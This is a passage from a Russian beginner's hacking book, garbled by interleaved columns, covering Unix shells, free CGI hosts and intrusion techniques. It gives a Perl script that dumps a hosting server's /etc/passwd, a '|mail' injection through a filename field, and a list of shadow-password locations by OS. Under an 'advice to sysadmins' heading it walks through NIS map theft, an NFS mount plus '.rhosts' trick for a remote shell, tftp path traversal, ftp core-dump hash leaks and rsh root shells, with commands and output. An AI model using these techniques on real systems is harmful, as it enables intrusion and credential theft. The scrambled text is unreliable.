модемных каналах. А о графических оболочках вспоминать и вовсе не Так или иначе, начнем… 89 Хакинг с самого начала Хакинг с самого начала echo $SHELL приходится, — комфортная работа /bin/sh возможна лишь при наличии шустрой локальной сети! Поэтому, придется Теперь легко определить, какая поступиться некоторыми удобствами, и, именно оболочка запущена (конечно, при расставшись с мышью, разговаривать с условии, что никакие злые духи не компьютером языком текстовых команд.

изменили имя исполняемого файла).

Такое общение с UNIX в чем то Имена исполняемых файлов некоторых напоминает работу с популярных оболочек Пару слов об особенностях каждой интерпретатором MS DOS оболочки. Первой на свет появилась «command.com». Разумеется, названия оболочка Борна, фактически команд окажутся другими, но в целом представляющая собой язык принцип тот же.

программирования, ориентированный на В UNIX (в отличие от MS DOS) нет управление процессами, вводом выводом стандартной командной оболочки, поэтому и операции шаблонного поиска. Никакого первая задача пользователя — выяснить, интерактивного взаимодействия с что именно установлено в системе, и пользователем в ней не какие альтернативные оболочки доступны.

предусматривалось, и вся работа сводилась к написанию управляющих программ — Путь к используемой в данный скриптов, обрабатываемых оболочкой.

момент оболочке содержится в переменной $SHELL и вывести его на Первая интерактивная оболочка, экран можно с помощью команды «echo получившая название «С», возникла в $SHELL» (соблюдая регистр). Результат ее университете Беркли. Она быстро работы может быть следующим:

завоевала популярность, но имела множество недостатков и содержала кучу Эмулятор UWIN ошибок, поэтому полностью вытеснить echo $SHELL оболочку Борна так и не смогла. Проблема /usr/bin/ksh же совместного сосуществования Эмулятор CYGWIN 91 Хакинг с самого начала Хакинг с самого начала заключалась в полной несовместимости LINUX сделали bash самой популярной командных языков обоих оболочек. Это оболочкой всех времен и народов, хотя приводило к невозможности выполнения многие до сих пор предпочитают скриптов, написанных для одной пользоваться C Shell или оригинальной оболочки, другой оболочкой. оболочкой Борна. К тому же, по прежнему не иссякает поток энтузиастов, пишущих К тому же открытость исходных свои собственные оболочки.

текстов «С» вызвала появление массы несовместимых между собой клонов. Во многих случаях различия между Некоторые из них дожили и до наших оболочками не столь существенны и не дней (как, например, «TC», своеобразный отражаются на простейших операциях, но гибрид «С» и «TENEX» — операционной все примеры, приводимые в этой главе, системы PDP 10). предназначены для оболочки Корна и их успешное выполнение в других оболочках Существовали и коммерческие не гарантируется (хотя и предполагается).

оболочки. Из них наибольшей Поэтому, полезно знать, какие оболочки популярностью пользовалось творение, установлены администратором на машине.

созданное Дэвидом Корном, В этом поможет команда объединившее в себе лучшие черты своих «cat /etc/shells», результат работы которой предшественников. Компания AT&T на свежеустановленном эмуляторе UWIN распространяла ее вместе с операционной выглядит следующим образом:

системой System V, объявив стандартном cat /etc/shells де юре.

/usr/bin/ksh Стандарт — хорошо, но платить /usr/bin/sh компании никто не хотел, и вскоре /usr/bin/tcsh оболочка Борна была полностью /usr/bin/csh переписана в рамках проекта GNU, /bin/sh получив название bash — Borne Again /bin/ksh Shell. Многочисленные /bin/csh усовершенствования и перенос в среду /bin/tcsh 93 Хакинг с самого начала Хакинг с самого начала Запустить любую оболочку можно, оболочки не поддерживают такой набрав ее имя (возможно, вместе с команды. Вместо этого пользователю полным путем), в командной строке. А предоставляется возможность вызвать вернуться назад обычно помогает команда внешнюю утилиту, выполняющую всю exit. В качестве тренировочного необходимую работу. Обычно в UNIX для упражнения полезно запустить все отображения содержимого каталога доступные оболочки по очереди. (Чаще используется программа ls, находящаяся в всего пути каталоге «/bin». Кстати, пользователи эмулятора «/usr/bin» и «/bin» указывают на один и CYGWIN прежде чем смогут ей тот же каталог, поэтому эквивалентны воспользоваться, должны скачать с сервера друг другу). архив fileutils.tar.gz — в минимальный комплект поставки она не входит.

$ echo $SHELL/usr/bin/ksh $ /usr/bin/sh Вызов без параметров выводит на # echo $SHELL экран содержимое текущего каталога, а /usr/bin/ksh заглянуть в корень поможет наклонная # exit черта — «ls /».

$ /usr/bin/tcsh ls / # echo $SHELL A E proc /usr/bin/ksh base.bat etc reg # exit baseserviceslink.sh F sys $ /usr/bin/csh bin H tmp %echo $SHELL C home usr /usr/bin/ksh D lib var %exit dev linka win Для просмотра содержимого Узнать, что находится в каталоге директорий в командном интерпретаторе «/etc» можно, передав его имя в качестве command.com (MS DOS) предусмотрена параметра команде ls:

встроенная команда «dir», но UNIX 95 Хакинг с самого начала Хакинг с самого начала $ ls /etc отбивочки, тут курсивчик, вверху crontab inetdconfig.sh passwd.add заголовок с картинкой. Вот на этом traceit возможности HTML и исчерпываются.

in.ftpd init.exe priv.exe Чаты, скажем, уже требуют сложных tracer.exe операций, и не могут обойтись без Java in.rlogind login.allow profile или подобных языков. Это скрипты и есть.

ucs.exe Но для хака они не годятся.

in.rshd login.deny rc ums.exe Почему? Да потому что исполняются in.telnetd mailx.rc services на локальной машине, то есть вашем inetd.conf mkpasswd.exe shells домашнем компьютере. А сервер только inetd.exe passwd stop_uwin посылает и принимает от них данные.

Печально.

Скрипты Что то сделал автор? Говорит, Но есть другая категория скриптов запустил скрипт на удаленной машине?

— тех, что исполняются на удаленном Но что это значит? Давайте разбираться.

компьютере, то есть сервере, а вам Вероятно, читатель уже сталкивался с отсылают (или не отсылают) результат различными скриптами, в web страничках.

своей работы. Они имеют Обычно они написаны на Java или Visual непосредственный доступ к системе, и Basic. Ну, а если не сталкивался — так это если администратор не ограничит вас в не беда, можно установить Нетскейпу и правах, то скрип может даже совсем немного пробродить по Инет, как отформатировать жесткий диск сервера тот начнет ругаться «Скрипт Еррор такой или подпустить вируса или трояна. Ну, на то». Ну что делать, — глючная вещь худой конец, просто полазить и шпионить Нетскейп.

по всем директориям (это, кстати, часто и не запрещается).

А скрипты — это такие программы, которые расширяют возможности языка Итак, что бы ломать нужно всего HTML. Ведь HTML позволяет только лишь иметь право выполнять программы управлять форматированием текста — там на удаленном компьютере. На жаргоне это 97 Хакинг с самого начала Хакинг с самого начала обзывается «иметь доступ к директории Выходит, Перловым скриптом мы CGI BIN». Тогда вы можете закинуть туда смогли просмотреть всех юзеров? Ведь любую программу, и ее исполнить. Хоть расширение то у файла было PL!

обычный exe файл типа BackOrifice2000. Действительно, это Perl. И если мы Правда, за одним небольшим найдем в себе труд хотя бы поверхностно исключением. Исполняемый файл должен изучить этот замечательный язык, то соответствовать модели компьютера и потом наши хакерские возможности операционной системе, которая неограниченно расширятся! За дело, установлена на сервере начнем изучать Perl! Однако, для начала придется немного огорчить читателя.

Другими словами, если это Pentium Чтобы исполнять Перловый скрипт — это Pro и Windows NT, то можно смело кидать же надо еще права иметь! А большинство всех Энтевых троянов и вирусов — и они бомажатников с халявными страничками успешно сработают.

таких прав не имеют.

Правда, вот такую конфигурацию Правда, все солидные и платные найти можно не так уж часто. Гораздо серверы такой доступ непременно дают. И вероятнее встретить DEC Alpha и UNIX.

многие просто в обмен на баннерную Это несколько хуже… рекламу (например, www.agava.ru). Но у Но существует ли способ, одинаково какого хакера найдется лишняя деньга?

хорошо приглядный для всех систем?

Выходит, что вся загвоздка в том, Разумеется да. Для любого Юникса чтобы найти удобный и хороший сервер. А подойдет программа, написанная на Си.

главное бесплатный! К счастью такие Правда ее не «берет» NT. Зато Perl сервера есть! Пусть немного, но нам одинаково хорошо воспринимается, как хватит, для начала, а потом, потом мы UNIX, так и NT. Если, правда, установлен научимся получать доступ и к тем, кто его интерпретатор. Но, обычно он все же такие права зажимает.

установлен.

Кстати, многие www сервера имеют незакрытый доступ к cgi bin и если 99 Хакинг с самого начала Хакинг с самого начала VirtualAve хорошо поискать, то их можно найти!

Правда, если тамошний админ не совсем Дает под страничку 20 Мб. Вместе с лох, то такую дырку он быстро прикроет, этим доступ к cgi bin, и разрешает стоит только сунуться! выполнять Perl скрипты.

Но, об этом потом, а пока смотрите Имеет древний sendmail, который список серверов, где такой доступ дается так же интересно поковырять (или просто за просто так! отправлять почту в свое удовольствие).

Предоставляет домен третьего Сервера, дающие странички и уровня, то есть вы получите что то вроде право исполнять CGI http://yourname.virtualave.net/.

Вообще то традиционно за право Разрешает закачку по FTP, однако выполнить CGI нужно платить, да еще и имя сервера для этого выглядит иначе зарегистрироваться так, чтобы в случае (например, ftp://server26.virtual.ave).

чего администратор мог вас найти и Внимательно читайте инструкцию.

надавать по ушам. Ведь имея такой доступ к системе можно сделать очень и очень Пока лучший из всей категории.

много плохого. Кому это понравится?

Реклама — выпрыгивающий баннер.

Однако, мучительно долго регистрирует Но, тем не менее, в Internet найти вас в системе. Необходимо ждать целые можно все! И даже таких сутки, прежде чем вам откроют аккаунт. К администраторов, которые тому же скорость не самая лучшая из расщедриваются на такой доступ, да еще и возможных, но для скриптов сойдет.

предоставляют его на халяву! Чтобы их найти, можно набить в любом поисковике Hypermart «CGI+Free+Perl» или побродить по Дает под страничку 10 мегабайт (для страничкам, сборникам ссылок на халяву.

скриптов это очень много), разумеется, Словом, если вас не устроит ни один дает право исполнения Perl скриптов и пункт из списка, приведенного ниже, то почтовой рассылки.

всегда можно найти что то и самим.

101 Хакинг с самого начала Хакинг с самого начала Webjump Очень надоедает своими баннерами, зато это один из старейших сервисов и его Обещает 25 мегабайт и доступ к скоро не прикроют. CGI BIN, но очень часто его (доступ) вырубает на случайное время, да и Perl В дополнение к этому дает какой то кривой стоит, часто проблемы с возможность создавать собственную нью исполнением скриптов.

конференцию, ну и домен третьего уровня типа «http://yourname.hypermart.net/». Очень очень очень увешан Впрочем, домен регистрируется в течении баннерами, но зато дает домен третьего нескольких часов, но доступ типа уровня и самое главное, содержит «http://server26.hypermart.net/ kpnc» офигенное число дыр, которые сразу не появляется тут же. заткнут (не успеют) — поэтому тренироваться начинающим хакерам на Так же доступен по FTP, но очень нем самое то!

неплохо защищен, и начинать с него не советую, хотя в остальных отношениях — ProHosting рульный сервак.

Довольно неплохой сервер, быстрый и приятный. Регистрирует ваш домен в Правда есть одно «но» — чтобы течение четырех часов. Но никаких получить доступ, нужно ввести код дополнительных сервисов тут нет.

подтверждения, высылаемый вам на e mail. Вот тут вся и JustFree загвоздка — все бесплатные e mail Дает доступ к cgi bin и Шеллу.

отметаются сервером, как саксь и маст Очень тормозит, но это один из очень дай. В том числе и часть платных немногих серверов, дающий халявный российских тоже, например, ZMAIL.RU и Шелл, так что придется с этим TELEMEDNET.RU. Поэтому придется примириться.

извращаться и где то искать платный ящик или иметь договоренность с его автором, на изыску писем.

103 Хакинг с самого начала Хакинг с самого начала Заливаем наш первый скрипт! Обращаю внимание, что имя хоста по FTP может не совпадать с WWW, — Итак, будем считать, что на сервере читайте об этом подробнее в инструкции вы себе аккаунт поимели по полной на сервере!

программе. Это не такая сложная операция, чтобы на ней останавливаться.

Вот и все. Дважды долбанем по Enter Достаточно лишь заполнить форму, в и дождемся пока оно соединиться. Если которой нас будут придирчиво при этом вас отошлют, то что то сделано расспрашивать о наших занятиях и неправильно, а может, аккаунт еще не был доходах, — если что введем не правильно, зарегистрирован. Подождите и попробуйте и нас пошлют, так можно попробовать снова!

еще раз!

После того, как вы соединитесь с Теперь остается только залить на сервером, заливать файлы будет можно, наш новый аккаунт свой первый скрипт и как в обычном Norton Commander, только полюбоваться результатами его работы.

естественно, намного медленнее.

Заливать, конечно, будем по FTP. Для Но в какую директорию закачивать этого нам потребуется FTP клиент, скрипты? Конечно же, в поддерживающий закачку. Например, всем /CGI BIN, если только она есть! Но ее известный FAR.

может и не быть! Это не повод нервничать Запустим его и в панели дисков и волноваться. Значит, скрипты могут выберем «FTP».

выполняться в другой директории. Так у «HyperMart» — это корневая директория Теперь нажмем и в вашего аккаунта, а на «Virualave» это появившемся окне диалога введем наш /public_html. Но прежде чем что то логин, пароль и хост (то есть, имя закачивать, это «что то» надо создать. А сервера).

для этого нужно знать Perl. Впрочем, можно по началу поучиться на чужих скриптах.

105 Хакинг с самого начала Хакинг с самого начала Но это еще не все! После того, как расположенном на сервере не останется.

скрипт залит на сервер, ему необходимо Впрочем, вам на установить атрибуты исполняемого, иначе e mail так же должна прийти инструкция с он исполняться не захочет. подробными разъяснениями.

Для этого опять воспользуется уже Итак, набираем сие в браузере, успевшим нам полюбиться FAR ом. например, http://kpnc.hypermart.net/hello.pl Встаньте на только что закаченный файл и для «Hypermart» и любуемся файлом нажмите . Установите атрибуты etc/password этого сервера. Любуемся от eXecutable — то есть, исполняемый настолько, что я даже рискнул привести и нажмите Enter. всю таблицу целиком:

DISPLAY ETC/PASSWORD FILE… Но, возможно, этого делать и не LOGIN NAME PATH придется, если директория, куда вы root System Administrator собрались копировать скрипт, уже имеет /root такие атрибуты (тогда они наследуются, то toor System Administrator есть передаются по умолчанию, всем /root расположенным в этой директории daemon System Daemon файлам). Просмотреть их можно точно так / же, переместив на нее курсор и нажав sys Operating System /tmp Все! Теперь пришло время испытать bin BSDI Software сей агрегат в действии. Наберите в строке /usr/bsdi браузера путь к скрипту… стоп, а откуда operator System Operator мы его знаем? Как он должен выглядеть?

/usr/opr uucp UNIX to UNIX Copy Сложно сказать однозначно. Все /var/spool/uucppublic зависит от конкретных настоек сервера.

games Games Pseudo user Поэтому ничего, кроме как сходить и /usr/games почитать об этом в faq, заботливо news USENET News,,, 107 Хакинг с самого начала Хакинг с самого начала /var/news/etc nonroot Non root root user for demo Demo User NFS/nonexistent /usr/demo hmvbin 65536 66559 reserved for mail Sendmail hmv/nonexistent /var/spool/mail Караул! Тут нет ни одного юзера!

brian Brian Atkins,,, (ну, кроме demo). Верно, а что вы хотели?

/export/home/brian Сказано же было, что сервер старый, alias,,, вылизанный, дыры все убраны, и /var/qmail/alias пользователи за просто так не qmaild,,, отображаются.

/var/qmail Впрочем, в дальнейшем мы все же qmaill,,, на него попадем, но это будет не сейчас… /var/qmail Сейчас же мы попробуем какой нибудь qmailp,,, другой сервер, что настроен по /var/qmail отношению к юным хакерам не так qmailq,,, агрессивно.

/var/qmail qmailr,,, Немного хитростей и уловок /var/qmail qmails,,, Хитрость /var/qmail Результат работы скрипта не виден ftp FTP Daemon,,, под Нетскейп. Ну, так написан скрипт.

/var/spool/ftp Пользуйтесь милым моему сердцу proftp FTP Daemon,,, Эксплорером! А Нетскейп такая глючная /var/spool/ftp вещь!

www Publish Account,,, Хитрость /usr/home/www Все это, конечно, очень круто, но nobody Unprivileged user ведь очень часто случается так, что /nonexistent доступа к скриптам нам никто не дает. А 109 Хакинг с самого начала Хакинг с самого начала Хитрость файл то (известно какой) утянуть хочется!

Можно ли это сделать? Иногда да, только Обратите внимание на следующие нужно поискать дырки в существующих строки скрипта:

скриптах.

($login, $pass, $uid, $gid, $name, $home_dir, $shell) = split(':');

А очень часто бывает так, что они есть, только незаметны с первого взгляда.

print "

есть какой то скрипт (сейчас не важно print "$login";

какой и где), но который запрашивает у print "

пользователя имя файла, которое надлежит print "$name";

открыть (очень часто бывает в различных print "

web почтовых ящиках, да и в других print "$home_dir"l случаях то же).

То есть пароль считывается из Тогда можно ввести что то вроде файла, но не выводится?! Истинно так.

«|mail VasyaPupukin@mail.com

не оставит равнодушными!

Далеко не все разработчики скриптов учитывают такую ситуацию.

Приложение 1. Скрипт hack.pl Поэтому, однозначно, дыры в системах #!/usr/local/bin/perl безопасности есть и они вокруг нас! Надо print "Content type: text/html\n\n";

только хорошо поискать и не боятся print "";

print "≶

IMG SRC= http://dore.on.ru/kpnc/images/PH.JPG>< 111 Хакинг с самого начала Хакинг с самого начала BR>";

Приложение 2. Где хранятся print "Пожалуйста, посетите сайт

href=http://kpnc.id.ru>PRO Если админ не совсем лох, то в HACK
";

etc/passwd паролей не будет. Там можно print "DISPLAY ETC/PASSWD FILE… \n";

обнаружить только «крестики». А сами print "

";

пароли где? А пароли совсем в другом print "

";

месте, и обычно это место от рядового print "

LOGIN";

юзера скрыто. То есть, доступ отрублен.

print "

NAME";

Но иногда случается так, что это сделать print "

DIR";

забыли!

open(PASS, "

Так скажите же, где то золотое место! Увы, оно не одно и зависит от while() настоек администратора и выбранной { системы. Ниже приводятся конфигурации ($login, $pass, $uid, $gid, $name, по умолчанию. Попытайтесь, — быть $home_dir, $shell) = split(':');

может вам повезет:

print "";

print "";

AIX print "$login";

/etc/security/passwd/tcb/auth/files/&l print "";

g;

first letter username>/ print "$name";

A/UX 3.0s print "";

/tcb/files/auth/?/* print "$home_dir";

} BSD4.3 Reno print "

";

/etc/master.passwd close(PASS);

ConvexOS /etc/shadpw ConvexOS /etc/shadow 113 Хакинг с самого начала Хакинг с самого начала DG/UX UNICOS /etc/tcb/aa/user/ /etc/udb Как этим пользоваться? Очень EP/IX просто — заменить путь в следующей /etc/shadow сточке скрипта на новый.

HP UX open(PASS, "

/.secure/etc/passwd IRIX Советы системному /etc/shadow администратору Linux 1. /etc/shadow Каждый день по всему миру OSF/ взламываются компьютерные сети и /etc/passwd[.dir|.pag] сервера. Уровень этих атак различен.

SCO Unix #.2.x Вопреки общему представлению, что /tcb/auth/files// слабых паролей, множество атак использует более сложный способ. Эти SunOS4.1+c /etc/security/passwd.adjunct способы менее известны и их трудно обнаружить. Чтобы защититься от таких проникновений, необходимо понимать их.

SunOS 5. Мы попытаемся пояснить некоторые из /etc/shadow них… System V Release 4. Большинство книг и документов, /etc/shadow посвященных защите, смотрят на нее System V Release 4. глазами администратора — человека, /etc/security/ который сидит внутри системы и иногда databaseUltrix 4 плохо представляет ее внешние границы.

/etc/auth[.dir|.pag] Давайте отойдем от привычных 115 Хакинг с самого начала Хакинг с самого начала представлений о системе защиты. 1. finger и rusers Посмотрим на нее глазами devil# finger @www.xxx.xxxx.su потенциального взломщика. Для этого [www.xxx.xxxx.su] человека ваша система — черный ящик Login Name (или коробка шоколадных конфет).

TTY Idle When Показывая, что он может сделать для того Office чтобы получить доступ на ваш компьютер, kuzmenko Vladimir Kizmenko p мы пытаемся помочь системным 4:57 Sun 08: администраторам получить представление kuzmenko Vladimir Kizmenko p о том, насколько реально защищен ваш 2:38 Sun 08: хост. Мы не предполагаем раскрыть здесь milichen Yuri Mulichenko p все технологии и лазейки в системе — их 4:59 Fri 19:41 3B/r410 1 35 количество растет каждый день. Системы sherbak Eugeny Scherbkov p усовершенствуются — изменяются 5:00 Sat 10:18 221/r448 1 77 технологии.

Какую информацию мы можем devil# finger yur@ccsix.xxxx.xxxx.ru получить об удаленной системе?

[ccsix.xxxx.xxxx.ru] Существует множество сетевых сервисов, к Login: yur которым следует обратиться: finger, rusers, Name: Yuri A. Podgorodsky showmount, rpcinfo, dns, ftp, sendmail… В Directory: /home/yur идеале стоит собирать всю возможную Shell: /bin/bash информацию — информация это власть.

On since Sat Apr 12 12:24 (MSK) on ttyp0 from jannet.xxxx.xxxx Давайте попробуем. Что мы можем 3 hours 35 minutes idle узнать?

Mail forwarded to Возможно неплохой шаг сначала yur@jannet.xxxx.xxxx.ru узнать возможные allias, имя nameserver и No mail.

состав сети, в которой стоит этот хост. В No Plan.

этом может помочь nslookup.

devil# rusers l unisun.xxxxx xxx.net 117 Хакинг с самого начала Хакинг с самого начала Login Name unknown TTY When Idle 100000 2 udp Host 0.0.0.0.0.111 rpcbind lavrov unisun.xxxxx unknown xxx:console Apr 2 10:32 17:37 100004 2 udp suh unisun.xxxxx 0.0.0.0.2.150 ypserv xxx:ttyp0 Apr 5 10:20 unknown 17:32 (mskws.desy.de) 100004 2 tcp lavrov unisun.xxxxx 0.0.0.0.2.151 ypserv xxx:ttyp1 Apr 2 11:21 unknown 25:55 (:0.0) 100004 1 udp lavrov unisun.xxxxx 0.0.0.0.2.150 ypserv xxx:ttyp2 Apr 2 10:33 unknown 97:11 (:0.0) 100004 1 tcp 0.0.0.0.2.151 ypserv Эти сервисы дают нам аккаунты, unknown позволяют нам узнать кто в данный 100069 1 udp момент работает в системе, их shell и 0.0.0.0.2. домашний каталог, возможно имена unknown доверенных хостов. Обратите внимание на 100069 1 tcp графу Idle, если в ней стоит несколько 0.0.0.0.2. часов, то скорее всего в данный момент unknown никто не обратит на вас внимание.

100007 2 tcp 2. rpcinfo 0.0.0.0.4.0 ypbind devil# rpcinfo sun10.xxx.xxx.su unknown program version netid address 100007 2 udp service owner 0.0.0.0.4.3 ypbind 100000 2 tcp unknown 0.0.0.0.0.111 rpcbind 100007 1 tcp 119 Хакинг с самого начала Хакинг с самого начала 0.0.0.0.4.0 ypbind 100005 2 tcp unknown 0.0.0.0.2.226 mountd 100007 1 udp unknown 0.0.0.0.4.3 ypbind 100024 1 udp unknown 0.0.0.0.2.226 status 100028 1 tcp unknown 0.0.0.0.2.156 ypupdated 100024 1 tcp unknown 0.0.0.0.2.228 status 100028 1 udp unknown 0.0.0.0.2.158 ypupdated 100021 1 tcp unknown 0.0.0.0.2.229 nlockmgr 100009 1 udp unknown 0.0.0.0.3.255 yppasswdd rpcinfo дает информацию о unknown запущенных RPC сервисах. Наиболее 100029 1 udp интересны из них mountd, nisd, ypserv и 0.0.0.0.2.159 keyserv ypbind, statd, bootparam, pcnfsd, rexd. statd unknown позволяет стереть удаленно любой файл.

100003 2 udp pcnfsd и mountd дают доступ к дискам 0.0.0.0.8.1 nfs машины, rexd — удаленное выполнение unknown команд.

100005 1 udp 3. NIS (nisd, ypbind, ypserv).

0.0.0.0.2.223 mountd unknown Если эта машина является NIS 100005 2 udp сервером, то зная NIS имя домена вы 0.0.0.0.2.223 mountd можете получить любые NIS карты unknown простым rpc запросом. Обычно это имя 100005 1 tcp совпадает с именем домена и можно 0.0.0.0.2.226 mountd попытаться его угадать:

unknown devil# ypx dg sun10.xxx.xxx.su 121 Хакинг с самого начала Хакинг с самого начала Trying domain sun10.xxx.xxx.su YP map transfer successfull.

Trying domain sun Мы заменили первые два символа Trying domain xxx.xxx.su каждого пароля на «» и изменили имена sysdiag:*:0:1:Old System здесь и далее в тексте.

Diagnostic:/usr/diag/sysdiag:/usr/diag Если угадать NIS имя домена не /sysdiag/sysdiag удается, возможно получить его через sundiag:*:0:1:System bootparam сервис или подсмотреть в Diagnostic:/usr/diag/sundiag:/usr/diag директории /var/yp, если она доступна / публично.

sundiag/sundiag sybase:*:13:55:syb:/usr/nms/sybase:/bi 4. showmount n/csh devil# showmount e nobody:*:65534:65534::/:

thsun1.xxxx.xxxxx.su daemon:*:1:1::/:

export list for thsun1.xxxx.xxxxx.su:

audit:*:9:9::/etc/security/audit:/bin/ /pub csh (everyone) uucp:*:4:8::/var/spool/uucppublic:

/opt sync:F324VMRDcL6:1:1::/:/bin/sync thsun2,thsun3,tlx root:Ye.Ibw.8uQg:0:3:Operator:/:/bin /pgm/linux /csh (everyone) news:*:6:6::/var/spool/news:/bin/csh /export sys:*:2:2::/:/bin/csh (everyone) snm:7ck.pfEh/2s:11:11:Network /usr Manager:/usr/snm:/bin/csh (everyone) rom:IriAsoksSeE:10:10:Victor /tftpboot Romanchik:/usr/rom:/bin/csh (everyone) nms:*:12:55:Network /cdrom/sol_2_3_hw894_sparc/s Manager:/usr/nms:/bin/csh (everyone) bin:*:3:3::/bin:

/home 123 Хакинг с самого начала Хакинг с самого начала (everyone) 512 Feb 14 11:16 lnp /scratch/users drwxr xr x 6 root other (everyone) 512 Feb 14 11:19 lnup drwxr xr x 4 root other С помощью showmount мы узнали о 512 Jan 15 1995 lnur разделах, предоставляемых этим хостом, о devil# cd lnup правах доступа к ним и возможно о devil# ls al доверенных хостах. Такие важные каталоги total как export, home, usr доступны всем!

drwxr xr x 6 root other Попробуем… 512 Feb 14 11:19.

devil# mount F nfs drwxr xr x 17 root root thsun1.xxxx.xxxxx.su:/home /mnt 1024 Jun 28 1996..

devil# cd /mnt drwxr xr x 3 6000 devil# ls al 512 Oct 30 1995 dolbilov total drwxr xr x 9 6190 drwxr xr x 17 root root 1024 Oct 7 1996 davgun 1024 Jun 28 1996.

drwxr xr x 4 6001 drwxr xr x 28 root root 512 Oct 20 1995 gvf 1024 Apr 12 16:29..

drwxr xr x 4 6003 drwxr xr x 2 root root 512 Apr 4 10:31 yup 512 May 19 1995 TT_DB devil# echo 'dolbilov::600:' >> drwxr xr x 3 root /etc/groups 512 Nov 25 1994 cfi devil# echo drwxr xr x 6 root 'dolbilov:x:6000:600::/noway:/bin/csh' 512 Nov 25 1994 dug >> /etc/passwd drwxr xr x 9 root other devil# su dolbilov 512 Feb 17 11:19 lcta $ cd dolbilov drwxr xr x 3 root other $ ls al 512 Jun 19 1996 lhep total drwxr xr x 6 root other 125 Хакинг с самого начала Хакинг с самого начала drwxr xr x 3 dolbilov dolbilov 220 www.xxx.ru ESMTP Sendmail 512 Apr 12 16:21. 8.8.5/8.8.5;

Sat, 12 Apr drwxr xr x 6 root other 15:55:36 + 512 Feb 14 11:19.. vrfy serg rw r r 1 dolbilov dolbilov 550 serg… User unknown 2901 Apr 7 1993.cshrc vrfy alex rw r r 1 dolbilov dolbilov 250 Alexei E. Katov

2196 Oct 30 1995 mbox drwxr xr x 2 dolbilov dolbilov Новые версии выходят регулярно, старые 512 Nov 25 1994 timezone ошибки исправляются, появляются новые.

$ echo '+ +' >.rhosts 6. tftp $ exit devil# rsh l dolbilov tftp широко известная программа thsun1.xxxx.xxxxx.su /bin/csh i похожая на ftp, служит для простейшего $ трансфера файлов. Ошибки в ней известны и исправлены в большинстве Таким образом мы получили shell на ОС, но и нижеследующий пример можно удаленной машине.

встретить:

5. sendmail devil# tfp www.xxx.ru devil# telnet www.xxx.ru tftp> get Trying 193.124.xxx.xx… /tmp/../../../../../etc/pa Connected to www.xxx.ru.

sswd /tmp/passwd Escape character is '^]'.

tftp> quit 127 Хакинг с самого начала Хакинг с самого начала devil# Login failed.

ftp> quote pasv 7. ftp 421 Service not available, remote Сервис ftp является не только server has closed connection удобным, но и опасным для вашей ftp> o xxxxxxxxxxx.xxx.com системы. Опасность представляет не Connected to xxxxxxxxxxx.xxx.com.

только возможность украсть доверенную 220 xxxxxxxxxxx FTP server (UNIX(r) информацию или занести свою при System V Release 4.0) ready.

неправильной конфигурации демона.

Name (xxxxxxxxxxx.xxx.com:root): ftp Опасность представляет возможное 331 Guest login ok, send ident as крушение демона командами пользователя.

password.

devil# ftp xxxxxxxxxxx.xxx.com Password:

Connected to xxxxxxxxxxx.xxx.com.

230 Guest login ok, access 220 xxxxxxxxxxx FTP server (UNIX(r) restrictions apply.

System V Release 4.0) ready.

ftp> bin Name (xxxxxxxxxxx.xxx.com:root): ftp 200 Type set to I.

331 Guest login ok, send ident as ftp> get core password.

200 PORT command successful.

Password:

150 Binary data connection for core 230 Guest login ok, access (194.хх.ххх.ххх,51553) restrictions apply.

(281136 bytes).

ftp> user root 226 Binary Transfer complete.

530 User root unknown.

local: core remote: core Login failed.

281136 bytes received in 16 seconds ftp> user root (17 Kbytes/s) 530 User root unknown.

ftp> bye Login failed.

221 Goodbye.

ftp> user foobar devil# 530 User foobar access denied.

/********** Fragment of core 129 Хакинг с самого начала Хакинг с самого начала ************/ Приведем только наиболее важные ….994:..S.:.

порты:

srk:a2U/fw.FWhk:….::::..S X server harat:mQb7Pij8mrA:….::::..S@ X сервер базируется на портах kchu:/sPKnswJ8y2:9….::::..S` + номер дисплея. Если Х сервер не yhew:0/L6foNhPoA:9….::::..S.

использует для аутентификации magic :h6qh9see7ry.M:9353:….:.

cookies или защита отключена командой pa..S.WGZ/NEzsLjwe 2:9097::…..

xhost +, информация с его дисплеев может flo..S.Xbra.0mg/PMc :9097:::….

быть подсмотрена или украдена, нажатия dave..S.0VnE0zICamE: 9097::::….

клавиш записаны, программы запущены on:2..T.VqQO2BOU:909 7::::::…..:

удаленно (xspy, xpush). Если хост /************************************* поддерживает соединение к 6000 порту, то ***/ это может быть использовано для Мы заменили первые два символа denial_of_service атак.

каждого пароля на «».

rlogin и talkd 7. rexd В большинстве систем эти сервисы devil# su daemon имеют ошибки, связанные с $ on i faxnetxx.xxx.ru /bin/sh i переполнением буфера. rlogin пытается $ uname a получить от удаленной системы faxnetxx faxnetxx 3.2 2 i переменную TERM, а talkd — узнать имя $ id хоста, требующего соединение. Если эти uid=1(daemon) gid=1(other) демоны получают в ответ строку большой $ длинны, то происходит переполнение 8. Сканирование портов.

буфера. Это дает возможность выполнить Портмэппер сообщает только о rpc удаленно команды с привилегиями root.

сервисах. Об остальных запущенных сервисах можно узнать прямым сканированием портов.

131 Хакинг с самого начала Хакинг с самого начала rsh и rexec наиболее часто заходят пользователи, rsh и rexec позволяют получить особенно администраторы, просматривая командную оболочку не оставляя записей права на доступ к NFS разделам.

в log файлах. Кроме того, эти сервисы не Использование доверительных отношений отслеживают запрет на удаленный root создает определенное удобство, но вместе логин (/etc/default/login). с тем порождает опасность проникновения в систему злоумышленников. Взломщик devil# rsh l smtp xxxx.xxx.ru может исказить информацию в DNS или /bin/csh i NIS сервере и выдавать себя за Warning: no access to tty;

thus no доверенный хост.

job control in this shell… # id uid=0(root) gid=0(root) Как получить доступ к devil# nc v xxxx.xxx.ru удаленному компьютеру xxxx.xxx.ru [194.85.xxx.xxx] (exec) open Использование ^@root^@rootpasswd^@/bin/csh i^@ Warning: no access to tty;

thus no EssentialNetTools 2. job control in this shell… Получить доступ к удаленному # id компьютеру, то есть к любому компьютеру uid=0(root) gid=1(other) в Internet или локальной сети можно, 9. Доверенные хосты. используя самую продуманную и распространенную в кругах хакеров Обычно, работая в пределах одной программу EssentialNetTools 2.2. Для группы, пользователям разрешается без начала нужно наметить жертву. Легче пароля входить на соседние компьютеры.

всего поддаются «обработке» хозяева Такие доверительные машины нескольких компьютеров, объединённых в указываются в файлах.rhosts и hosts.equiv.

домашнюю локальную сеть. Чтобы не Предположить, какие хосты являются бегать с дискетами с одного компа на доверенными, можно отслеживая откуда другой, они расшаривают винты обоих 133 Хакинг с самого начала Хакинг с самого начала компьютеров для обмена данными по их достучаться, жмёшь Add Record. Теперь у сетке. Они и не подозревают, что также тебя есть три пути. Во первых, можно:

